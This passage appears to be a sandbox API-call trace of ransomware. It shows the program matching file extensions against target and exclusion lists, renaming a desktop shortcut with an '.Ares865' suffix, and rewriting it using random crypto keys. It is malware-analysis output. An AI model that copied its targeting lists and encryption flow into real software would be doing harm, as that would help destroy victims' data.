lstrlenW (lpString="maf") returned 3 [0057.458] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0057.458] lstrlenW (lpString="maq") returned 3 [0057.458] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0057.458] lstrlenW (lpString="mar") returned 3 [0057.458] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0057.458] lstrlenW (lpString="marshal") returned 7 [0057.458] lstrcmpiW (lpString1="ome.lnk", lpString2="marshal") returned 1 [0057.458] lstrlenW (lpString="mas") returned 3 [0057.458] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0057.458] lstrlenW (lpString="mav") returned 3 [0057.458] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0057.458] lstrlenW (lpString="maw") returned 3 [0057.458] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0057.458] lstrlenW (lpString="mdbhtml") returned 7 [0057.458] lstrcmpiW (lpString1="ome.lnk", lpString2="mdbhtml") returned 1 [0057.458] lstrlenW (lpString="mdn") returned 3 [0057.458] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0057.458] lstrlenW (lpString="mdt") returned 3 [0057.458] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0057.459] lstrlenW (lpString="mfd") returned 3 [0057.459] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0057.459] lstrlenW (lpString="mpd") returned 3 [0057.459] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0057.459] lstrlenW (lpString="mrg") returned 3 [0057.459] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0057.459] lstrlenW (lpString="mud") returned 3 [0057.459] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0057.459] lstrlenW (lpString="mwb") returned 3 [0057.459] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0057.459] lstrlenW (lpString="myd") returned 3 [0057.459] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 [0057.459] lstrlenW (lpString="ndf") returned 3 [0057.459] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0057.459] lstrlenW (lpString="nnt") returned 3 [0057.459] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0057.459] lstrlenW (lpString="nrmlib") returned 6 [0057.459] lstrcmpiW (lpString1="me.lnk", lpString2="nrmlib") returned -1 [0057.459] lstrlenW (lpString="ns2") returned 3 [0057.459] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0057.459] lstrlenW (lpString="ns3") returned 3 [0057.459] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0057.459] lstrlenW (lpString="ns4") returned 3 [0057.459] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0057.459] lstrlenW (lpString="nsf") returned 3 [0057.459] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0057.459] lstrlenW (lpString="nv") returned 2 [0057.459] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0057.459] lstrlenW (lpString="nv2") returned 3 [0057.459] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0057.459] lstrlenW (lpString="nwdb") returned 4 [0057.459] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0057.459] lstrlenW (lpString="nyf") returned 3 [0057.459] lstrcmpiW (lpString1="lnk", lpString2="nyf") returned -1 [0057.459] lstrlenW (lpString="odb") returned 3 [0057.459] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0057.459] lstrlenW (lpString="odb") returned 3 [0057.460] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0057.460] lstrlenW (lpString="oqy") returned 3 [0057.460] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0057.460] lstrlenW (lpString="ora") returned 3 [0057.460] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0057.460] lstrlenW (lpString="orx") returned 3 [0057.460] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0057.460] lstrlenW (lpString="owc") returned 3 [0057.460] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0057.460] lstrlenW (lpString="p96") returned 3 [0057.460] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0057.460] lstrlenW (lpString="p97") returned 3 [0057.460] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0057.460] lstrlenW (lpString="pan") returned 3 [0057.460] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0057.460] lstrlenW (lpString="pdb") returned 3 [0057.460] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0057.460] lstrlenW (lpString="pdm") returned 3 [0057.460] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0057.460] lstrlenW (lpString="pnz") returned 3 [0057.460] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0057.460] lstrlenW (lpString="qry") returned 3 [0057.460] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0057.460] lstrlenW (lpString="qvd") returned 3 [0057.460] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0057.460] lstrlenW (lpString="rbf") returned 3 [0057.460] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0057.460] lstrlenW (lpString="rctd") returned 4 [0057.460] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0057.460] lstrlenW (lpString="rod") returned 3 [0057.460] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0057.460] lstrlenW (lpString="rodx") returned 4 [0057.460] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0057.460] lstrlenW (lpString="rpd") returned 3 [0057.460] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0057.460] lstrlenW (lpString="rsd") returned 3 [0057.460] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0057.460] lstrlenW (lpString="sas7bdat") returned 8 [0057.461] lstrcmpiW (lpString1="rome.lnk", lpString2="sas7bdat") returned -1 [0057.461] lstrlenW (lpString="sbf") returned 3 [0057.461] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0057.461] lstrlenW (lpString="scx") returned 3 [0057.461] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0057.461] lstrlenW (lpString="sdb") returned 3 [0057.461] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0057.461] lstrlenW (lpString="sdc") returned 3 [0057.461] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0057.461] lstrlenW (lpString="sdf") returned 3 [0057.461] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0057.461] lstrlenW (lpString="sis") returned 3 [0057.461] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0057.461] lstrlenW (lpString="spq") returned 3 [0057.461] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0057.461] lstrlenW (lpString="te") returned 2 [0057.461] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0057.461] lstrlenW (lpString="teacher") returned 7 [0057.461] lstrcmpiW (lpString1="ome.lnk", lpString2="teacher") returned -1 [0057.461] lstrlenW (lpString="tmd") returned 3 [0057.461] lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0057.461] lstrlenW (lpString="tps") returned 3 [0057.461] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0057.461] lstrlenW (lpString="trc") returned 3 [0057.461] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0057.461] lstrlenW (lpString="trc") returned 3 [0057.461] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0057.461] lstrlenW (lpString="trm") returned 3 [0057.461] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0057.461] lstrlenW (lpString="udb") returned 3 [0057.461] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0057.461] lstrlenW (lpString="udl") returned 3 [0057.461] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0057.461] lstrlenW (lpString="usr") returned 3 [0057.461] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0057.461] lstrlenW (lpString="v12") returned 3 [0057.461] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0057.461] lstrlenW (lpString="vis") returned 3 [0057.462] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0057.462] lstrlenW (lpString="vpd") returned 3 [0057.462] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0057.462] lstrlenW (lpString="vvv") returned 3 [0057.462] lstrcmpiW (lpString1="lnk", lpString2="vvv") returned -1 [0057.462] lstrlenW (lpString="wdb") returned 3 [0057.462] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0057.462] lstrlenW (lpString="wmdb") returned 4 [0057.462] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0057.462] lstrlenW (lpString="wrk") returned 3 [0057.462] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0057.462] lstrlenW (lpString="xdb") returned 3 [0057.462] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0057.462] lstrlenW (lpString="xld") returned 3 [0057.462] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0057.462] lstrlenW (lpString="xmlff") returned 5 [0057.462] lstrcmpiW (lpString1="e.lnk", lpString2="xmlff") returned -1 [0057.462] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Desktop\\Google Chrome.lnk.Ares865") returned 49 [0057.462] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Desktop\\Google Chrome.lnk" (normalized: "c:\\users\\public\\desktop\\google chrome.lnk"), lpNewFileName="C:\\Users\\Public\\Desktop\\Google Chrome.lnk.Ares865" (normalized: "c:\\users\\public\\desktop\\google chrome.lnk.ares865"), dwFlags=0x1) returned 1 [0057.463] CreateFileW (lpFileName="C:\\Users\\Public\\Desktop\\Google Chrome.lnk.Ares865" (normalized: "c:\\users\\public\\desktop\\google chrome.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0057.463] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2257) returned 1 [0057.463] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0057.463] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0057.463] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0057.463] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0057.464] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0057.464] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0057.464] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xbe0, lpName=0x0) returned 0x164 [0057.465] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbe0) returned 0x190000 [0057.465] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0057.466] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0057.466] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0057.466] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0057.466] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0057.466] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0057.467] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0057.467] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0057.467] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0057.467] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0057.467] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0057.467] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0057.467] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0057.467] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0057.467] CloseHandle (hObject=0x164) returned 1 [0057.467] CloseHandle (hObject=0x15c) returned 1 [0057.468] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0057.468] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0057.468] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0057.469] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49ac48e0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x49ac48e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0057.469] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0057.469] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0a09a40, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x485, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mozilla Firefox.lnk", cAlternateFileName="MOZILL~1.LNK")) returned 1 [0057.469] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0057.469] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="aoldtz.exe") returned 1 [0057.469] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2=".") returned 1 [0057.469] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="..") returned 1 [0057.469] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="windows") returned -1 [0057.469] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="bootmgr") returned 1 [0057.469] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="temp") returned -1 [0057.469] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="pagefile.sys") returned -1 [0057.469] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="boot") returned 1 [0057.469] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="ids.txt") returned 1 [0057.469] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="ntuser.dat") returned -1 [0057.469] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="perflogs") returned -1 [0057.469] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2="MSBuild") returned -1 [0057.469] lstrlenW (lpString="Mozilla Firefox.lnk") returned 19 [0057.469] lstrlenW (lpString="C:\\Users\\Public\\Desktop\\Google Chrome.lnk") returned 41 [0057.469] lstrcpyW (in: lpString1=0x2cce430, lpString2="Mozilla Firefox.lnk" | out: lpString1="Mozilla Firefox.lnk") returned="Mozilla Firefox.lnk" [0057.469] lstrlenW (lpString="Mozilla Firefox.lnk") returned 19 [0057.469] lstrlenW (lpString="Ares865") returned 7 [0057.469] lstrcmpiW (lpString1="fox.lnk", lpString2="Ares865") returned 1 [0057.469] lstrlenW (lpString=".dll") returned 4 [0057.469] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2=".dll") returned 1 [0057.469] lstrlenW (lpString=".lnk") returned 4 [0057.469] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2=".lnk") returned 1 [0057.469] lstrlenW (lpString=".ini") returned 4 [0057.469] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2=".ini") returned 1 [0057.469] lstrlenW (lpString=".sys") returned 4 [0057.469] lstrcmpiW (lpString1="Mozilla Firefox.lnk", lpString2=".sys") returned 1 [0057.469] lstrlenW (lpString="Mozilla Firefox.lnk") returned 19 [0057.469] lstrlenW (lpString="bak") returned 3 [0057.469] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0057.469] lstrlenW (lpString="ba_") returned 3 [0057.470] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0057.470] lstrlenW (lpString="dbb") returned 3 [0057.470] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0057.470] lstrlenW (lpString="vmdk") returned 4 [0057.470] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0057.470] lstrlenW (lpString="rar") returned 3 [0057.470] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0057.470] lstrlenW (lpString="zip") returned 3 [0057.470] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0057.470] lstrlenW (lpString="tgz") returned 3 [0057.470] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0057.470] lstrlenW (lpString="vbox") returned 4 [0057.470] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0057.470] lstrlenW (lpString="vdi") returned 3 [0057.470] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0057.470] lstrlenW (lpString="vhd") returned 3 [0057.470] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0057.470] lstrlenW (lpString="vhdx") returned 4 [0057.470] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0057.470] lstrlenW (lpString="avhd") returned 4 [0057.470] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0057.470] lstrlenW (lpString="db") returned 2 [0057.470] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0057.470] lstrlenW (lpString="db2") returned 3 [0057.470] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0057.470] lstrlenW (lpString="db3") returned 3 [0057.470] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0057.470] lstrlenW (lpString="dbf") returned 3 [0057.470] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0057.470] lstrlenW (lpString="mdf") returned 3 [0057.470] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0057.470] lstrlenW (lpString="mdb") returned 3 [0057.470] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0057.470] lstrlenW (lpString="sql") returned 3 [0057.470] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0057.471] lstrlenW (lpString="sqlite") returned 6 [0057.471] lstrcmpiW (lpString1="ox.lnk", lpString2="sqlite") returned -1 [0057.471] lstrlenW (lpString="sqlite3") returned 7 [0057.471] lstrcmpiW (lpString1="fox.lnk", lpString2="sqlite3") returned -1 [0057.471] lstrlenW (lpString="sqlitedb") returned 8 [0057.471] lstrcmpiW (lpString1="efox.lnk", lpString2="sqlitedb") returned -1 [0057.471] lstrlenW (lpString="xml") returned 3 [0057.471] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0057.471] lstrlenW (lpString="$er") returned 3 [0057.471] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0057.471] lstrlenW (lpString="4dd") returned 3 [0057.471] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0057.471] lstrlenW (lpString="4dl") returned 3 [0057.471] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0057.471] lstrlenW (lpString="^^^") returned 3 [0057.471] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0057.471] lstrlenW (lpString="abs") returned 3 [0057.471] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0057.471] lstrlenW (lpString="abx") returned 3 [0057.471] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0057.471] lstrlenW (lpString="accdb") returned 5 [0057.471] lstrcmpiW (lpString1="x.lnk", lpString2="accdb") returned 1 [0057.471] lstrlenW (lpString="accdc") returned 5 [0057.471] lstrcmpiW (lpString1="x.lnk", lpString2="accdc") returned 1 [0057.471] lstrlenW (lpString="accde") returned 5 [0057.471] lstrcmpiW (lpString1="x.lnk", lpString2="accde") returned 1 [0057.471] lstrlenW (lpString="accdr") returned 5 [0057.471] lstrcmpiW (lpString1="x.lnk", lpString2="accdr") returned 1 [0057.471] lstrlenW (lpString="accdt") returned 5 [0057.471] lstrcmpiW (lpString1="x.lnk", lpString2="accdt") returned 1 [0057.471] lstrlenW (lpString="accdw") returned 5 [0057.471] lstrcmpiW (lpString1="x.lnk", lpString2="accdw") returned 1 [0057.471] lstrlenW (lpString="accft") returned 5 [0057.471] lstrcmpiW (lpString1="x.lnk", lpString2="accft") returned 1 [0057.471] lstrlenW (lpString="adb") returned 3 [0057.471] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0057.471] lstrlenW (lpString="adb") returned 3 [0057.472] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0057.472] lstrlenW (lpString="ade") returned 3 [0057.472] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0057.472] lstrlenW (lpString="adf") returned 3 [0057.472] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0057.472] lstrlenW (lpString="adn") returned 3 [0057.472] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0057.472] lstrlenW (lpString="adp") returned 3 [0057.472] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0057.472] lstrlenW (lpString="alf") returned 3 [0057.472] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0057.472] lstrlenW (lpString="ask") returned 3 [0057.472] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0057.472] lstrlenW (lpString="btr") returned 3 [0057.472] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0057.472] lstrlenW (lpString="cat") returned 3 [0057.472] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0057.472] lstrlenW (lpString="cdb") returned 3 [0057.472] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0057.472] lstrlenW (lpString="ckp") returned 3 [0057.472] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0057.472] lstrlenW (lpString="cma") returned 3 [0057.472] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0057.472] lstrlenW (lpString="cpd") returned 3 [0057.472] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0057.472] lstrlenW (lpString="dacpac") returned 6 [0057.472] lstrcmpiW (lpString1="ox.lnk", lpString2="dacpac") returned 1 [0057.472] lstrlenW (lpString="dad") returned 3 [0057.472] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0057.472] lstrlenW (lpString="dadiagrams") returned 10 [0057.472] lstrcmpiW (lpString1="irefox.lnk", lpString2="dadiagrams") returned 1 [0057.472] lstrlenW (lpString="daschema") returned 8 [0057.472] lstrcmpiW (lpString1="efox.lnk", lpString2="daschema") returned 1 [0057.472] lstrlenW (lpString="db-journal") returned 10 [0057.472] lstrcmpiW (lpString1="irefox.lnk", lpString2="db-journal") returned 1 [0057.472] lstrlenW (lpString="db-shm") returned 6 [0057.473] lstrcmpiW (lpString1="ox.lnk", lpString2="db-shm") returned 1 [0057.473] lstrlenW (lpString="db-wal") returned 6 [0057.473] lstrcmpiW (lpString1="ox.lnk", lpString2="db-wal") returned 1 [0057.473] lstrlenW (lpString="dbc") returned 3 [0057.473] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0057.473] lstrlenW (lpString="dbs") returned 3 [0057.473] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0057.473] lstrlenW (lpString="dbt") returned 3 [0057.473] lstrcmpiW (lpString1="lnk", lpString2="dbt") returned 1 [0057.473] lstrlenW (lpString="dbv") returned 3 [0057.473] lstrcmpiW (lpString1="lnk", lpString2="dbv") returned 1 [0057.473] lstrlenW (lpString="dbx") returned 3 [0057.473] lstrcmpiW (lpString1="lnk", lpString2="dbx") returned 1 [0057.473] lstrlenW (lpString="dcb") returned 3 [0057.473] lstrcmpiW (lpString1="lnk", lpString2="dcb") returned 1 [0057.473] lstrlenW (lpString="dct") returned 3 [0057.473] lstrcmpiW (lpString1="lnk", lpString2="dct") returned 1 [0057.473] lstrlenW (lpString="dcx") returned 3 [0057.473] lstrcmpiW (lpString1="lnk", lpString2="dcx") returned 1 [0057.473] lstrlenW (lpString="ddl") returned 3 [0057.473] lstrcmpiW (lpString1="lnk", lpString2="ddl") returned 1 [0057.473] lstrlenW (lpString="dlis") returned 4 [0057.473] lstrcmpiW (lpString1=".lnk", lpString2="dlis") returned -1 [0057.473] lstrlenW (lpString="dp1") returned 3 [0057.473] lstrcmpiW (lpString1="lnk", lpString2="dp1") returned 1 [0057.473] lstrlenW (lpString="dqy") returned 3 [0057.473] lstrcmpiW (lpString1="lnk", lpString2="dqy") returned 1 [0057.473] lstrlenW (lpString="dsk") returned 3 [0057.473] lstrcmpiW (lpString1="lnk", lpString2="dsk") returned 1 [0057.473] lstrlenW (lpString="dsn") returned 3 [0057.473] lstrcmpiW (lpString1="lnk", lpString2="dsn") returned 1 [0057.473] lstrlenW (lpString="dtsx") returned 4 [0057.473] lstrcmpiW (lpString1=".lnk", lpString2="dtsx") returned -1 [0057.473] lstrlenW (lpString="dxl") returned 3 [0057.473] lstrcmpiW (lpString1="lnk", lpString2="dxl") returned 1 [0057.473] lstrlenW (lpString="eco") returned 3 [0057.474] lstrcmpiW (lpString1="lnk", lpString2="eco") returned 1 [0057.474] lstrlenW (lpString="ecx") returned 3 [0057.474] lstrcmpiW (lpString1="lnk", lpString2="ecx") returned 1 [0057.474] lstrlenW (lpString="edb") returned 3 [0057.474] lstrcmpiW (lpString1="lnk", lpString2="edb") returned 1 [0057.474] lstrlenW (lpString="epim") returned 4 [0057.474] lstrcmpiW (lpString1=".lnk", lpString2="epim") returned -1 [0057.474] lstrlenW (lpString="fcd") returned 3 [0057.474] lstrcmpiW (lpString1="lnk", lpString2="fcd") returned 1 [0057.474] lstrlenW (lpString="fdb") returned 3 [0057.474] lstrcmpiW (lpString1="lnk", lpString2="fdb") returned 1 [0057.474] lstrlenW (lpString="fic") returned 3 [0057.474] lstrcmpiW (lpString1="lnk", lpString2="fic") returned 1 [0057.474] lstrlenW (lpString="flexolibrary") returned 12 [0057.474] lstrcmpiW (lpString1=" Firefox.lnk", lpString2="flexolibrary") returned -1 [0057.474] lstrlenW (lpString="fm5") returned 3 [0057.474] lstrcmpiW (lpString1="lnk", lpString2="fm5") returned 1 [0057.474] lstrlenW (lpString="fmp") returned 3 [0057.474] lstrcmpiW (lpString1="lnk", lpString2="fmp") returned 1 [0057.474] lstrlenW (lpString="fmp12") returned 5 [0057.474] lstrcmpiW (lpString1="x.lnk", lpString2="fmp12") returned 1 [0057.474] lstrlenW (lpString="fmpsl") returned 5 [0057.474] lstrcmpiW (lpString1="x.lnk", lpString2="fmpsl") returned 1 [0057.474] lstrlenW (lpString="fol") returned 3 [0057.474] lstrcmpiW (lpString1="lnk", lpString2="fol") returned 1 [0057.474] lstrlenW (lpString="fp3") returned 3 [0057.474] lstrcmpiW (lpString1="lnk", lpString2="fp3") returned 1 [0057.474] lstrlenW (lpString="fp4") returned 3 [0057.474] lstrcmpiW (lpString1="lnk", lpString2="fp4") returned 1 [0057.474] lstrlenW (lpString="fp5") returned 3 [0057.474] lstrcmpiW (lpString1="lnk", lpString2="fp5") returned 1 [0057.474] lstrlenW (lpString="fp7") returned 3 [0057.474] lstrcmpiW (lpString1="lnk", lpString2="fp7") returned 1 [0057.474] lstrlenW (lpString="fpt") returned 3 [0057.474] lstrcmpiW (lpString1="lnk", lpString2="fpt") returned 1 [0057.474] lstrlenW (lpString="frm") returned 3 [0057.475] lstrcmpiW (lpString1="lnk", lpString2="frm") returned 1 [0057.475] lstrlenW (lpString="gdb") returned 3 [0057.475] lstrcmpiW 